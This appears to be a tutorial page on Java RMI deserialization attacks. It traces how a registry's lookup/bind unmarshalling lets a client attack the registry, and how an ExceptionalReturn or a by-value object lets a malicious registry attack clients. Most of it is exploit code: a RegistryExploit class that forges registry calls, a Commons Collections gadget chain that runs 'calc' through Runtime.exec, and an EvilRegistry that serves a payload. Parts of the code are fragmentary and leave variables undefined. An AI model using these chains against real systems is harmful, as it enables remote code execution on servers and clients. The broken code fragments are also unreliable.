Registry-side dispatch chain: handleMessages → serviceCall → UnicastServerRef#dispatch → oldDispatch → RegistryImpl_Skel#dispatch. // the registry can be attacked from the client side (and, see the client chain below, the registry can attack its clients); the skeleton dispatches on the opnum: case 0: // bind(String, Remote) case 1: // list() case 2: // lookup(String) → in.readObject(); — the lookup argument is unmarshalled with readObject(), so a client that sends an arbitrary serialized object in place of the String gets it deserialized inside the registry process (client attacks server). case 3: // rebind(String, Remote) case 4: // unbind(String). bind/rebind likewise have to unmarshal their Remote argument; the exact read calls for those cases are not reproduced here. Caveat: JDKs with serialization filtering (JEP 290) apply a registry filter to these readObject calls, so the chain on this page presupposes an older or unfiltered runtime — confirm the target's JDK version before relying on it.
代码
public class RegistryExploit {
    /**
     * Entry point: obtains a stub for the local registry and drives the
     * lookup-based attack against it; the bind-based variant is kept as a
     * commented-out alternative exactly as in the original.
     *
     * @param args ignored
     * @throws Exception any failure while contacting the registry is propagated
     */
    public static void main(String[] args) throws Exception {
        String host = "127.0.0.1";
        int port = 1099;
        // Cast to the concrete JDK stub class so that its private "ref" field can
        // later be reached by reflection (see lookup/bind below).
        RegistryImpl_Stub registry = (RegistryImpl_Stub) LocateRegistry.getRegistry(host, port);
        lookup(registry);
        // bind(registry);
    }
public static void lookup(RegistryImpl_Stub registry) throws Exception {
Class RemoteObjectClass = registry.getClass().getSuperclass().getSuperclass(); Field refField = RemoteObjectClass.getDeclaredField("ref"); refField.setAccessible(true); UnicastRef ref = (UnicastRef) refField.get(registry);
Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};
public static void bind(RegistryImpl_Stub registry) throws Exception {
Class RemoteObjectClass = registry.getClass().getSuperclass().getSuperclass(); Field refField = RemoteObjectClass.getDeclaredField("ref"); refField.setAccessible(true); UnicastRef ref = (UnicastRef) refField.get(registry);
Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};
public static HashMap genEvilMap() throws Exception{
Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}) };
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");
HashMap<Object, Object> map2 = new HashMap<>(); map2.put(tiedMapEntry, "bbb"); lazyMap.remove("aaa");
Class c = LazyMap.class; Field factoryField = c.getDeclaredField("factory"); factoryField.setAccessible(true); factoryField.set(lazyMap,chainedTransformer);
Running the code above as-is fails with: Caused by: java.rmi.UnmarshalException: unrecognized method hash: method not supported by remote object at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:294). The registry's dispatch (the server-side chain above) checks the hash carried in the call against what the opnum-based RegistryImpl_Skel expects, so a call assembled from the Operation[] table must carry the interface hash that the skeleton checks rather than a hash derived from an individual method signature; the exact value is not shown on this page and should be taken from the JDK's RegistryImpl_Skel/RegistryImpl_Stub sources.
public class EvilRegistry {
    /**
     * Starts a registry on port 1099 and binds a RemoteWrapper under the name
     * "remoteObj". A RemoteObjImpl is constructed first, presumably for the
     * side effects of its constructor (its definition is not on this page);
     * the instance itself is discarded, as in the original.
     *
     * Security note: RemoteWrapper is declared Serializable (see below); if it
     * is not exported as a remote object, it travels by value, so a client that
     * looks it up deserializes the whole object, including its map, in the
     * client process.
     *
     * @param args ignored
     * @throws Exception any failure while creating the registry or binding
     */
    public static void main(String[] args) throws Exception {
        new RemoteObjImpl();
        Remote payloadHolder = new RemoteWrapper();
        Registry registry = LocateRegistry.createRegistry(1099);
        String bindName = "remoteObj";
        registry.bind(bindName, payloadHolder);
    }
}
class RemoteWrapper implements Remote, Serializable { private Map map;
Client-side call chain: UnicastRef#invoke → StreamRemoteCall#executeCall → DataInputStream rd = new DataInputStream(conn.getInputStream()); → case TransportConstants.ExceptionalReturn: in.readObject();. This is the server-attacks-client direction: whenever the remote side answers with an ExceptionalReturn, the client unconditionally deserializes whatever object follows, so any party that controls the other end of the connection (a malicious registry or remote object) can hand a gadget chain to a client that merely makes a call. The EvilRegistry sample above takes the complementary route of binding a Serializable RemoteWrapper that a client's lookup unmarshals by value; in both cases the client deserializes server-chosen bytes, and the same JEP 290 filter caveat applies on the client side.